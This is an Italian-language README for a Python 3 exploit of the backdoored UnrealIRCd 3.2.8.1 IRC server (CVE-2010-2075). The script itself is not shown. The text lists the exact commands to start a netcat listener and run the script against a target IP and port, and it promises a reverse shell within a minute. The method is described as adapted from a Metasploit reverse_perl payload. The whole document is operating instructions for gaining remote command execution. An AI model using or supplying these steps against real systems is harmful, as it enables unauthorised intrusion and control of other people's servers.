
Exploit di esecuzione di comandi backdoor in UnrealIRCd 3.2.8.1 in Python 3 (CVE-2010-2075).
Exploit dell'esecuzione di comandi backdoor di UnrealIRCd 3.2.8.1 in Python 3 (CVE-2010-2075).
La versione 3.2.8.1 di UnrealIRCd contiene un cavallo di Troia che consente a un attaccante remoto di eseguire comandi arbitrari (CVE-2010-2075).
Ho fatto riferimento al payload Metasploit payload/cmd/unix/reverse_perl per creare questo script.
Avvia un listener Netcat sull'host in ascolto:
nc -lp 4444
Esegui lo script fornendo i seguenti argomenti posizionali:
python3 script.py <target> <tport> <listener> <lport>
<target> Indirizzo IP dell'host di destinazione.<tport> Numero di porta dell'host di destinazione.<listener> Indirizzo IP dell'host in ascolto.<lport> Numero di porta dell'host in ascolto.Imposta un listener Netcat sulla tua macchina locale:
nc -lp 4444
Esegui lo script contro una macchina di destinazione all'indirizzo 192.168.1.3, porta TCP 6697:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
Aspetta un minuto e il listener Netcat dovrebbe ricevere una reverse shell.